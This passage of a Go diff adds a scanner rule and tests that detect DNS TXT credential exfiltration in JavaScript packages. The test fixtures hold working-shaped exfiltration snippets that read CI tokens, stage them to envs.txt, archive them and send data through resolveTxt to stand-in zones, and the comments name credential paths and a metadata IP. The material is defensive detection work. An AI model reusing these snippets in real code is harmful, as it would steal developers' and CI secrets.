+// IOC needle or three or more chain partners escalates to CRITICAL.
+func detectDNSTXTExfil(path string, m *metrics, content []byte) *types.Finding {
+	if !m.HasDNSTXTSink {
+		return nil
+	}
+	// Partner signals are evaluated on a comment-masked copy of the
+	// file so that documentation lines like `// uses process.env in
+	// CI` or `/* writes envs.txt */` do not satisfy a chain partner
+	// for a legitimate library that calls resolveTxt. The other
+	// jsrisk rules continue to read the raw-content metrics; the
+	// stricter check applies here because this rule fires on a
+	// single partner.
+	stripped := stripJSCommentsPreservingOffsets(content)
+	stringRanges := jsStringInteriors(content)
+	hasSecret := false
+	// Collect positions of `process.env.NAME = ...` / `process.env
+	// ['NAME'] = ...` assignment LHS so envReadRe matches at those
+	// positions are recognized as writes (not reads) and excluded
+	// from the secret partner.
+	envLHSStarts := map[int]bool{}
+	for _, loc := range processEnvDotLHSAssignRe.FindAllIndex(stripped, -1) {
+		envLHSStarts[loc[0]] = true
+	}
+	for _, match := range envReadRe.FindAllSubmatchIndex(stripped, -1) {
+		// Skip stringified examples like
+		// "export process.env.GITHUB_TOKEN in CI".
+		if insideStringInterior(stringRanges, match[0]) {
+			continue
+		}
+		if envLHSStarts[match[0]] {
+			continue
+		}
+		name := string(stripped[match[2]:match[3]])
+		for _, n := range ciSecretEnvVars {
+			if name == n {
+				hasSecret = true
+				break
+			}
+		}
+		if hasSecret {
+			break
+		}
+	}
+	if !hasSecret {
+		for _, match := range envDestructureRe.FindAllSubmatchIndex(stripped, -1) {
+			if insideStringInterior(stringRanges, match[0]) {
+				continue
+			}
+			body := string(stripped[match[2]:match[3]])
+			for _, raw := range strings.Split(body, ",") {
+				entry := strings.TrimSpace(raw)
+				// Strip any default initializer
+				// (`NAME = default`) before extracting the
+				// source member name.
+				if idx := strings.Index(entry, "="); idx >= 0 {
+					entry = strings.TrimSpace(entry[:idx])
+				}
+				if idx := strings.Index(entry, ":"); idx >= 0 {
+					entry = strings.TrimSpace(entry[:idx])
+				}
+				for _, n := range ciSecretEnvVars {
+					if entry == n {
+						hasSecret = true
+						break
+					}
+				}
+				if hasSecret {
+					break
+				}
+			}
+			if hasSecret {
+				break
+			}
+		}
+	}
+	if !hasSecret {
+		// Credential paths and cloud-metadata IPs are normally
+		// quoted in executable code (`fs.readFileSync(
+		// '/var/run/secrets/kubernetes.io/serviceaccount/token')`
+		// or `fetch('http://169.254.169.254/latest/meta-data/...')`),
+		// so a string-interior filter here would suppress real
+		// reads. The needles are specific enough that a help string
+		// merely mentioning them is the rarer case; accept the
+		// trade-off.
+		for _, n := range ciSecretLiteralNeedles {
+			if bytes.Contains(stripped, []byte(n)) {
+				hasSecret = true
+				break
+			}
+		}
+	}
+	if !hasSecret {
+		// Whole-process env reads are the most direct credential-
+		// exfil shape (`JSON.stringify(process.env)`,
+		// `Object.values(process.env).forEach(...)`, etc.). The
+		// match must originate in executable code, not inside a
+		// help string. Bracket-access matches that are the LHS of
+		// an assignment (`process.env[k] = ...`) are WRITES, not
+		// reads, and must be excluded.
+		assignLHSStarts := map[int]bool{}
+		for _, loc := range processEnvBracketLHSAssignRe.FindAllIndex(stripped, -1) {
+			assignLHSStarts[loc[0]] = true
+		}
+		for _, loc := range wholeProcessEnvRe.FindAllIndex(stripped, -1) {
+			if insideStringInterior(stringRanges, loc[0]) {
+				continue
+			}
+			if assignLHSStarts[loc[0]] {
+				continue
+			}
+			hasSecret = true
+			break
+		}
+	}
+	// envs.txt staging partner: an fs-write/append call must be in
+	// executable code (not inside a string and not inside a comment)
+	// within ~200 bytes of an `envs.txt` filename token. Decoupling
+	// the write anchor from the token keeps a documentation string
+	// like `"fs.writeFileSync('/envs.txt')"` from satisfying the
+	// partner, while still allowing the natural form where the
+	// filename is quoted inside an executable call.
+	hasEnvsTxt := false
+	fsBindingsDNS := collectModuleBindings(stripped, stringRanges,
+		fsModuleAliasRe, fsModuleAliasESMRe, fsDestructureRe, fsDestructureESMRe, fsModuleAliasESMCombinedRe)
+	// Collect (openParen, argEnd) ranges for each verified fs write
+	// call. The envs.txt token must fall INSIDE the first-argument
+	// range (the path argument); presence in the data position of
+	// the call (or in an unrelated statement) does not register.
+	type argRange struct{ start, end int }
+	var firstArgRanges []argRange
+	addRange := func(matchEnd int) {
+		openParen := matchEnd - 1
+		argEnd := firstArgEnd(stripped, openParen, stringRanges)
+		if argEnd <= openParen {
+			return
+		}
+		firstArgRanges = append(firstArgRanges, argRange{openParen + 1, argEnd})
+	}
+	for _, mt := range fsWriteReceiverRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[2]) {
+			continue
+		}
+		recv := string(stripped[mt[2]:mt[3]])
+		if !fsBindingsDNS.aliases[recv] && fsBindingsDNS.sourceByLocal[recv] != "promises" {
+			continue
+		}
+		if !fsWriteMethodNames[string(stripped[mt[4]:mt[5]])] {
+			continue
+		}
+		addRange(mt[1])
+	}
+	for _, mt := range fsWriteBareCallRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[2]) {
+			continue
+		}
+		if !fsWriteMethodNames[fsBindingsDNS.sourceByLocal[string(stripped[mt[2]:mt[3]])]] {
+			continue
+		}
+		addRange(mt[1])
+	}
+	for _, mt := range fsPromisesWriteReceiverRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[2]) {
+			continue
+		}
+		recv := string(stripped[mt[2]:mt[3]])
+		if !fsBindingsDNS.aliases[recv] && fsBindingsDNS.sourceByLocal[recv] != "promises" {
+			continue
+		}
+		if !fsWriteMethodNames[string(stripped[mt[4]:mt[5]])] {
+			continue
+		}
+		addRange(mt[1])
+	}
+	for _, mt := range inlineRequireFsWriteRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[2]) {
+			continue
+		}
+		addRange(mt[1])
+	}
+	if len(firstArgRanges) > 0 {
+		for _, loc := range envsTxtTokenRe.FindAllIndex(stripped, -1) {
+			for _, r := range firstArgRanges {
+				if loc[0] >= r.start && loc[0] < r.end {
+					hasEnvsTxt = true
+					break
+				}
+			}
+			if hasEnvsTxt {
+				break
+			}
+		}
+	}
+
+	// Archive partner: at least one executable os.tmpdir / tmpdir
+	// anchor (in code, not inside a string) must share a statement
+	// with a tar.gz / gzip / nt- token within 160 bytes. Statement
+	// sharing rejects a help-string archive mention adjacent to an
+	// unrelated tmpdir call.
+	hasArchive := false
+	osBindingsDNS := collectModuleBindings(stripped, stringRanges,
+		osModuleAliasRe, osModuleAliasESMRe, osDestructureRe, osDestructureESMRe, osModuleAliasESMCombinedRe)
+	var archiveTmpPositions []int
+	for _, mt := range archiveTmpReceiverRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[2]) {
+			continue
+		}
+		if !osBindingsDNS.aliases[string(stripped[mt[2]:mt[3]])] {
+			continue
+		}
+		archiveTmpPositions = append(archiveTmpPositions, mt[2])
+	}
+	for _, mt := range archiveTmpBareCallRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[2]) {
+			continue
+		}
+		if osBindingsDNS.sourceByLocal[string(stripped[mt[2]:mt[3]])] != "tmpdir" {
+			continue
+		}
+		archiveTmpPositions = append(archiveTmpPositions, mt[2])
+	}
+	for _, mt := range inlineRequireOsTmpdirRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[2]) {
+			continue
+		}
+		archiveTmpPositions = append(archiveTmpPositions, mt[2])
+	}
+	if len(archiveTmpPositions) > 0 {
+		for _, loc := range archiveTokenRe.FindAllIndex(stripped, -1) {
+			for _, a := range archiveTmpPositions {
+				if sameStatement(stripped, a, loc[0], 160, stringRanges) {
+					hasArchive = true
+					break
+				}
+			}
+			if hasArchive {
+				break
+			}
+		}
+	}
+	hasIOC := false
+	iocMatch := ""
+	for _, n := range nodeIPCIOCNeedles {
+		if bytes.Contains(stripped, []byte(n)) {
+			hasIOC = true
+			if iocMatch == "" {
+				iocMatch = n
+			}
+		}
+	}
+	// Daemon partner is re-derived on stripped content AND filtered
+	// by string interiors so a daemon snippet quoted inside a help
+	// string does not satisfy the partner. The detached:true and
+	// stdio:'ignore' matches inside the extracted args are also
+	// passed through a per-args string-interior filter so a
+	// `child_process.spawn('cmd', ['{detached: true, stdio: \'ignore\'}'])`
+	// shell-snippet argument cannot satisfy the daemon partner.
+	// The raw-content metric `m.HasDaemonChain` powers JS_DAEMON_001
+	// as before; that rule's single-signal scope keeps its
+	// existing behavior.
+	hasDaemon := false
+	for _, site := range collectChildProcessCalls(stripped) {
+		if insideStringInterior(stringRanges, site.Start) {
+			continue
+		}
+		args := extractCallArgs(stripped, site.ArgsStart)
+		argRanges := jsStringInteriors(args)
+		foundDetached := false
+		for _, loc := range detachedTrueRe.FindAllIndex(args, -1) {
+			if !insideStringInterior(argRanges, loc[0]) {
+				foundDetached = true
+				break
+			}
+		}
+		if !foundDetached {
+			continue
+		}
+		foundStdio := false
+		for _, loc := range stdioIgnoredRe.FindAllIndex(args, -1) {
+			if !insideStringInterior(argRanges, loc[0]) {
+				foundStdio = true
+				break
+			}
+		}
+		if !foundStdio {
+			continue
+		}
+		hasDaemon = true
+		break
+	}
+
+	// Each signal is a distinct partner: a payload that BOTH reads
+	// process.env secrets AND stages them to envs.txt is two separate
+	// behaviors in the exfil chain, not one collapsed condition. The
+	// CRITICAL escalation only triggers on three-plus partners, so
+	// keeping them separate matters for severity.
+	partners := 0
+	if hasSecret {
+		partners++
+	}
+	if hasEnvsTxt {
+		partners++
+	}
+	if hasArchive {
+		partners++
+	}
+	if hasDaemon {
+		partners++
+	}
+	if hasIOC {
+		partners++
+	}
+	if partners == 0 {
+		return nil
+	}
+
+	sev := types.SeverityHigh
+	if hasIOC || partners >= 3 {
+		sev = types.SeverityCritical
+	}
+
+	line := m.LineDNSTXT
+	if line == 0 {
+		line = 1
+	}
+	matched := "resolveTxt(...) + chain"
+	if hasIOC && iocMatch != "" {
+		matched = "resolveTxt(...) + " + iocMatch
+	}
+	return &types.Finding{
+		RuleID:   RuleDNSTXTExfil,
+		RuleName: "DNS TXT exfiltration chain in JavaScript",
+		Severity: sev,
+		Category: "supply-chain",
+		Description: "JavaScript invokes resolveTxt against the Node dns module and " +
+			"pairs it with at least one further exfiltration signal: a CI / cloud " +
+			"secret read, an envs.txt credential stage, a tar.gz archive staged " +
+			"under os.tmpdir(), an install-time daemon chain, or a known IOC " +
+			"string from the May 2026 node-ipc compromise. DNS TXT queries are " +
+			"the covert channel of choice when an attacker cannot rely on an " +
+			"HTTPS sink reaching the target environment.",
+		FilePath:    path,
+		Line:        line,
+		MatchedText: matched,
+		Analyzer:    AnalyzerName,
+		Confidence:  0.9,
+		Remediation: "Treat the surrounding package as compromised. Rotate any tokens the " +
+			"affected host has held, audit recent DNS egress for the suspicious zone, " +
+			"and pin the dependency to a known-clean version. Legitimate DNS TXT " +
+			"libraries do not combine resolveTxt with secret reads and archive staging.",
+	}
 }
 
 // detectObfuscation requires at least two signals AND at least one

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -1062,6 +1062,1342 @@ if (maps.includes('Runner.Worker')) { /* found runner */ }
 	}
 }
 
+// --- JS_DNS_TXT_EXFIL_001 ---
+
+func TestVuln_DNSTXTExfil_NodeIPCChain(t *testing.T) {
+	// The May 2026 node-ipc compromise shape: child_process.fork
+	// daemonization, env-var stage to envs.txt, archive packed into
+	// os.tmpdir, DNS TXT exfil via the bt.node.js zone. The DAEMON
+	// rule fires on its own chain; DNS TXT exfil fires CRITICAL
+	// thanks to the IOC needle and the multi-partner chain.
+	body := `
+const dns = require('dns');
+const cp = require('child_process');
+const fs = require('fs');
+const os = require('os');
+const t = process.env.GITHUB_TOKEN;
+fs.writeFileSync(os.tmpdir() + '/envs.txt', JSON.stringify(process.env));
+const archive = os.tmpdir() + '/nt-stage.tar.gz';
+const ch = cp.fork('./payload.cjs', [], {detached: true, stdio: 'ignore'}); ch.unref();
+dns.resolveTxt('xh.' + Date.now() + '.bt.node.js', (err, rec) => {});
+`
+	findings := analyze(t, "node-ipc.cjs", body)
+	f := findRule(findings, RuleDNSTXTExfil)
+	if f == nil {
+		t.Fatalf("expected JS_DNS_TXT_EXFIL_001 to fire on full chain, got: %+v", findings)
+	}
+	if f.Severity != types.SeverityCritical {
+		t.Errorf("expected CRITICAL on full IOC chain, got %v", f.Severity)
+	}
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf("daemon chain (cp.fork + detached + stdio:ignore + unref) must also still fire")
+	}
+}
+
+func TestVuln_DNSTXTExfil_ResolverInstance(t *testing.T) {
+	// resolveTxt called on a new dns.Resolver() instance is the same
+	// covert channel; the alias detector must bind the constructor's
+	// local name.
+	body := `
+const dns = require('node:dns');
+const r = new dns.Resolver();
+const t = process.env.NPM_TOKEN;
+require('fs').writeFileSync(require('os').tmpdir() + '/envs.txt', t);
+const arch = require('os').tmpdir() + '/nt-bundle.tar.gz';
+r.resolveTxt('probe.bt.node.js', (e, a) => {});
+`
+	findings := analyze(t, "payload.cjs", body)
+	if !hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("Resolver-based resolveTxt with secret + envs.txt + archive must trigger, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_PromisesDestructure(t *testing.T) {
+	// Destructured import of resolveTxt from dns/promises, aliased.
+	body := `
+import { resolveTxt as lookup } from 'dns/promises';
+import fs from 'fs';
+import os from 'os';
+const secret = process.env.AWS_ACCESS_KEY_ID;
+fs.writeFileSync(os.tmpdir() + '/envs.txt', secret);
+await lookup('bt.node.js');
+`
+	findings := analyze(t, "exfil.mjs", body)
+	f := findRule(findings, RuleDNSTXTExfil)
+	if f == nil {
+		t.Fatalf("destructured resolveTxt + secret + envs.txt + IOC must trigger, got: %+v", findings)
+	}
+	if f.Severity != types.SeverityCritical {
+		t.Errorf("expected CRITICAL when node-ipc IOC needle is present, got %v", f.Severity)
+	}
+}
+
+func TestSafe_DNSTXT_DMARCResolverOnly(t *testing.T) {
+	// A legitimate DMARC checker uses resolveTxt without any secret
+	// read, envs.txt staging, archive, daemon, or known IOC. Must
+	// not fire.
+	body := `
+const dns = require('dns').promises;
+async function checkDMARC(domain) {
+  const records = await dns.resolveTxt('_dmarc.' + domain);
+  return records.length > 0;
+}
+module.exports = { checkDMARC };
+`
+	findings := analyze(t, "dmarc.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("resolveTxt alone on a normal DMARC zone must not trigger, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_ArchiveAloneNoSink(t *testing.T) {
+	// tar.gz + os.tmpdir without any DNS TXT call (and no other chain
+	// signals) must not fire the DNS rule.
+	body := `
+const tar = require('tar');
+const os = require('os');
+tar.c({file: os.tmpdir() + '/build-output.tar.gz'}, ['./dist']);
+`
+	findings := analyze(t, "build.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("archive without a resolveTxt sink must not trigger, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_SecretAndEnvsTxtAreSeparatePartners(t *testing.T) {
+	// process.env read and envs.txt staging are two distinct exfil
+	// behaviors. With archive proximity added, the chain reaches three
+	// partners and must escalate to CRITICAL even without a known IOC
+	// or a daemon chain.
+	body := `
+const dns = require('dns');
+const fs = require('fs');
+const os = require('os');
+const t = process.env.GITHUB_TOKEN;
+fs.writeFileSync(os.tmpdir() + '/envs.txt', t);
+const archive = os.tmpdir() + '/stage.tar.gz';
+dns.resolveTxt('exfil.example', () => {});
+`
+	findings := analyze(t, "harvest.js", body)
+	f := findRule(findings, RuleDNSTXTExfil)
+	if f == nil {
+		t.Fatalf("expected JS_DNS_TXT_EXFIL_001 on secret + envs.txt + archive, got: %+v", findings)
+	}
+	if f.Severity != types.SeverityCritical {
+		t.Errorf("expected CRITICAL (three partners: secret, envs.txt, archive), got %v", f.Severity)
+	}
+}
+
+func TestVuln_DNSTXTExfil_PromisesOnModuleAlias(t *testing.T) {
+	// `dns.promises.resolveTxt(...)` is the documented Node form when
+	// the developer binds the callback module and reaches into the
+	// promise sub-namespace. The receiver regex must catch it.
+	body := `
+const dns = require('dns');
+const fs = require('fs');
+const os = require('os');
+const t = process.env.GITHUB_TOKEN;
+fs.writeFileSync(os.tmpdir() + '/envs.txt', t);
+const arch = os.tmpdir() + '/stage.tar.gz';
+await dns.promises.resolveTxt('exfil.example');
+`
+	findings := analyze(t, "promises.cjs", body)
+	if !hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("dns.promises.resolveTxt on a module alias must satisfy the sink, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_URLBeforeSinkOnSameLine(t *testing.T) {
+	// Minified one-line payload: a `https://...` URL literal appears
+	// before the resolveTxt call. A naive comment strip treats the
+	// `//` in the URL as a line-comment opener and blanks the rest
+	// of the line, hiding the sink. The string-aware walker keeps
+	// the URL bytes intact so the resolveTxt call still registers.
+	body := "const dns = require('dns'); const endpoint = 'https://sh.azurestaticprovider.net'; const t = process.env.GITHUB_TOKEN; require('fs').writeFileSync(require('os').tmpdir() + '/envs.txt', t); dns.resolveTxt('xh.bt.node.js', () => {});\n"
+	findings := analyze(t, "oneline.cjs", body)
+	if !hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("URL literal before resolveTxt on a minified line must NOT mask the sink, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_TemplateLiteralArchive(t *testing.T) {
+	// Real payloads commonly build the archive path via a template
+	// literal: `${os.tmpdir()}/stage.tar.gz`. The os.tmpdir() call
+	// inside ${...} is executable code, not string content, and
+	// must satisfy the archive partner.
+	body := "\n" +
+		"const dns = require('dns');\n" +
+		"const os = require('os');\n" +
+		"const archive = `${os.tmpdir()}/stage.tar.gz`;\n" +
+		"dns.resolveTxt('xh.bt.node.js', () => {});\n"
+	findings := analyze(t, "tpl-archive.cjs", body)
+	if !hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("template-literal `${os.tmpdir()}/stage.tar.gz` must satisfy the archive partner, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_UnrelatedTmpdirReceiverIsNotAnArchiveAnchor(t *testing.T) {
+	// `config.tmpdir()` is NOT the Node os helper. The archive
+	// anchor must not register it.
+	body := `
+const dns = require('dns');
+const config = { tmpdir: () => '/tmp/cache' };
+const archive = config.tmpdir() + '/stage.tar.gz';
+dns.resolveTxt('example.com', () => {});
+console.log(archive);
+`
+	findings := analyze(t, "config-tmp.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("config.tmpdir() must not satisfy the os archive anchor, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_CommaSeparatedResolver(t *testing.T) {
+	// `const dns = require('dns'), r = new dns.Resolver(); r.resolveTxt(...)`
+	// — comma-separated declaration of dns alias and Resolver
+	// instance. Both must register.
+	body := `
+const dns = require('dns'), r = new dns.Resolver();
+const t = process.env.GITHUB_TOKEN;
+console.log(t);
+r.resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "comma-resolver.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("comma-separated Resolver declaration must register the receiver")
+	}
+}
+
+func TestSafe_DNSTXT_StringArgDaemonOptionsNotAPartner(t *testing.T) {
+	// child_process.spawn() with a string argument that happens
+	// to contain `{detached: true, stdio: 'ignore'}` as DATA
+	// (e.g. a shell snippet) must NOT satisfy the daemon partner.
+	// The options inside the spawn's first quoted arg are not
+	// the call's own option object.
+	body := `
+const dns = require('dns');
+const cp = require('child_process');
+cp.spawn('echo {detached: true, stdio: \'ignore\'}', []);
+dns.resolveTxt('example.com', () => {});
+`
+	findings := analyze(t, "string-arg-daemon.cjs", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("daemon options inside a STRING argument must not satisfy the daemon partner, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_CallFollowedByBlockOnNewLine(t *testing.T) {
+	// A bare resolveTxt call followed by an unrelated block
+	// statement on the next line must still satisfy the sink.
+	// (Regression: previous isFunctionDefinition heuristic
+	// confused this with a method body.)
+	body := `
+const dns = require('dns');
+const { resolveTxt } = dns.promises;
+const t = process.env.GITHUB_TOKEN;
+console.log(t);
+resolveTxt('bt.node.js')
+{ const audit = 1; console.log(audit); }
+`
+	if !hasRule(analyze(t, "block-after.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("bare resolveTxt followed by a block on a new line must register the call")
+	}
+}
+
+func TestSafe_DNSTXT_RegexAfterControlFlowParenIsNotASink(t *testing.T) {
+	// Regex literal as the body of `if (x) /pattern/.test(s)`.
+	// The `)` is control-flow; `/` opens a regex, not division.
+	// The regex contents must not be treated as executable code.
+	body := `
+const dns = require('dns');
+const enabled = true;
+const src = 'something';
+const t = process.env.GITHUB_TOKEN;
+console.log(t);
+if (enabled) /dns\.resolveTxt\(.*\)/.test(src);
+`
+	findings := analyze(t, "ctrl-flow-regex.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("regex literal after control-flow `)` must not be executable code, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_WrappedProcessEnvSerialization(t *testing.T) {
+	// JSON.stringify({ env: process.env }) and
+	// JSON.stringify({ ...process.env }) both serialize the
+	// entire process.env. Both must satisfy the secret partner.
+	wrapped := `
+const dns = require('dns');
+const blob = JSON.stringify({ env: process.env });
+dns.resolveTxt('q.' + blob.length + '.example');
+`
+	if !hasRule(analyze(t, "wrapped.cjs", wrapped), RuleDNSTXTExfil) {
+		t.Errorf("JSON.stringify({env: process.env}) must satisfy the secret partner")
+	}
+	spread := `
+const dns = require('dns');
+const blob = JSON.stringify({ ...process.env });
+dns.resolveTxt('q.' + blob.length + '.example');
+`
+	if !hasRule(analyze(t, "spread.cjs", spread), RuleDNSTXTExfil) {
+		t.Errorf("JSON.stringify({...process.env}) must satisfy the secret partner")
+	}
+}
+
+func TestVuln_DNSTXTExfil_ResolveTxtDestructuredFromAlias(t *testing.T) {
+	// Two-step destructure: bind dns first, then destructure
+	// resolveTxt from `dns.promises`. The bare call `resolveTxt(
+	// ...)` must satisfy the sink.
+	body := `
+const dns = require('dns');
+const { resolveTxt } = dns.promises;
+const t = process.env.GITHUB_TOKEN;
+console.log(t);
+await resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "two-step.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("destructure of resolveTxt from a verified dns alias must satisfy the sink")
+	}
+}
+
+func TestVuln_DNSTXTExfil_DestructureWithDefault(t *testing.T) {
+	// `const { GITHUB_TOKEN = '' } = process.env` is a valid
+	// destructure with a default initializer. The source member
+	// name must be extracted by stripping the `= ...` initializer.
+	body := `
+const dns = require('dns');
+const { GITHUB_TOKEN = '' } = process.env;
+console.log(GITHUB_TOKEN);
+dns.resolveTxt('bt.node.js', () => {});
+`
+	if !hasRule(analyze(t, "default-destruct.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("destructure with default initializer must satisfy the secret partner")
+	}
+}
+
+func TestSafe_DNSTXT_NestedTmpdirOuterCommaSeparates(t *testing.T) {
+	// `const tmp = path.join(os.tmpdir()), help = 'stage.tar.gz';`
+	// — tmpdir is inside path.join, but after path.join's `)` the
+	// next `,` is at the OUTER (top) level and is a sequence
+	// separator. The archive token after it must not satisfy the
+	// partner.
+	body := `
+const dns = require('dns');
+const os = require('os');
+const path = require('path');
+const tmp = path.join(os.tmpdir()), help = 'stage.tar.gz';
+console.log(tmp, help);
+dns.resolveTxt('example.com', () => {});
+`
+	findings := analyze(t, "nested-tmp-comma.cjs", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("outer-comma after nested tmpdir must separate the archive partner, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_NamedEnvAssignmentIsNotARead(t *testing.T) {
+	// `process.env.GITHUB_TOKEN = 'fake'` is an assignment, not a
+	// read. Setup/test code that initializes named env vars
+	// must not satisfy the secret partner.
+	body := `
+const dns = require('dns');
+process.env.GITHUB_TOKEN = 'fake-for-test';
+process.env['NPM_TOKEN'] = 'test';
+dns.resolveTxt('example.com', () => {});
+`
+	findings := analyze(t, "env-assign.cjs", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("named env assignment must not satisfy the secret partner, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_DynamicProcessEnvWriteIsNotARead(t *testing.T) {
+	// `process.env[k] = 'x'` is a WRITE on the LHS of an
+	// assignment. Must not satisfy the secret partner.
+	body := `
+const dns = require('dns');
+const keys = ['LOG_LEVEL', 'CI'];
+for (const k of keys) process.env[k] = 'default';
+dns.resolveTxt('example.com', () => {});
+`
+	findings := analyze(t, "env-write.cjs", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("process.env[k] = ... write must not satisfy the secret partner, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_CommaSeparatedCJSDeclarators(t *testing.T) {
+	// Minified install scripts often declare multiple requires
+	// with a single keyword: `const fs = require('fs'), os = ...,
+	// dns = require('dns')`. The second and third bindings have
+	// no `const` prefix and must still register.
+	body := `
+const fs = require('fs'), os = require('os'), dns = require('dns');
+const t = process.env.GITHUB_TOKEN;
+fs.writeFileSync(os.tmpdir() + '/envs.txt', t);
+dns.resolveTxt('bt.node.js', () => {});
+`
+	if !hasRule(analyze(t, "comma-decl.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("comma-separated CJS declarators must register dns/fs/os aliases")
+	}
+}
+
+func TestSafe_DNSTXT_ObjectAssignProcessEnvTargetIsNotARead(t *testing.T) {
+	// Object.assign(process.env, defaults) MUTATES process.env;
+	// it does not read its values. Must not satisfy the secret
+	// partner.
+	body := `
+const dns = require('dns');
+Object.assign(process.env, { LOG_LEVEL: 'debug' });
+dns.resolveTxt('example.com', () => {});
+`
+	findings := analyze(t, "assign-target.cjs", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("Object.assign(process.env, ...) target-position write must not satisfy the secret partner, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_ObjectAssignProcessEnvAsSource(t *testing.T) {
+	// Object.assign({}, process.env) READS process.env values.
+	// Must satisfy the secret partner.
+	body := `
+const dns = require('dns');
+const cloned = Object.assign({}, process.env);
+console.log(cloned);
+dns.resolveTxt('bt.node.js', () => {});
+`
+	if !hasRule(analyze(t, "assign-source.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("Object.assign({}, process.env) source-position read must satisfy the secret partner")
+	}
+}
+
+func TestSafe_DNSTXT_EnvsTxtAsDataNotPath(t *testing.T) {
+	// fs.writeFileSync('/tmp/readme.txt', 'envs.txt') — envs.txt
+	// is the DATA being written, not the filename. Must not
+	// register as a staging partner.
+	body := `
+const dns = require('dns');
+const fs = require('fs');
+fs.writeFileSync('/tmp/readme.txt', 'envs.txt');
+dns.resolveTxt('example.com', () => {});
+`
+	findings := analyze(t, "envs-as-data.cjs", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("envs.txt as DATA (not path) must not satisfy the staging partner, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_InlineRequireBracketAccess(t *testing.T) {
+	// require('dns')['resolveTxt'](...) — no local alias, bracket
+	// access on the inline require chain.
+	body := `
+const t = process.env.GITHUB_TOKEN;
+console.log(t);
+require('dns')['resolveTxt']('bt.node.js');
+`
+	if !hasRule(analyze(t, "inline-bracket.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("inline require('dns')['resolveTxt']() must satisfy the sink")
+	}
+}
+
+func TestSafe_DNSTXT_SequenceExpressionSeparatesPartners(t *testing.T) {
+	// Top-level sequence expression: writeFileSync writes to an
+	// unrelated path, then a separate assignment puts envs.txt in
+	// a variable. The `,` at top level is a sequence separator;
+	// envs.txt must not be the staging partner for the write call.
+	body := `
+const dns = require('dns');
+const fs = require('fs');
+let help;
+fs.writeFileSync('/tmp/log','x'), help='/envs.txt';
+dns.resolveTxt('example.com', () => {});
+console.log(help);
+`
+	findings := analyze(t, "seq-expr.cjs", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("top-level sequence expression must separate write and envs.txt token, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_ObjectKeysProcessEnvAloneNotASecretRead(t *testing.T) {
+	// `Object.keys(process.env)` only enumerates variable names,
+	// not values. Without an actual value read, the secret
+	// partner must not register.
+	body := `
+const dns = require('dns');
+const names = Object.keys(process.env);
+console.log(names.length);
+dns.resolveTxt('example.com', () => {});
+`
+	if hasRule(analyze(t, "keys-only.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("Object.keys(process.env) without a value read must not satisfy the secret partner")
+	}
+}
+
+func TestVuln_DNSTXTExfil_DynamicBracketEnvAccess(t *testing.T) {
+	// The two-step pattern: enumerate keys, then dynamically read
+	// values via process.env[k]. The bracket access is the value
+	// read and must satisfy the partner.
+	body := `
+const dns = require('dns');
+Object.keys(process.env).forEach(k => dns.resolveTxt(process.env[k] + '.example'));
+`
+	if !hasRule(analyze(t, "dynamic-bracket.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("process.env[k] dynamic access must satisfy the secret partner")
+	}
+}
+
+func TestVuln_DNSTXTExfil_WholeProcessEnvForEach(t *testing.T) {
+	// Object.values(process.env).forEach(... dns.resolveTxt(...)).
+	// Most direct DNS credential-exfil shape; no specific CI
+	// variable is named, but the whole-env enumeration is itself
+	// the secret partner.
+	body := `
+const dns = require('dns');
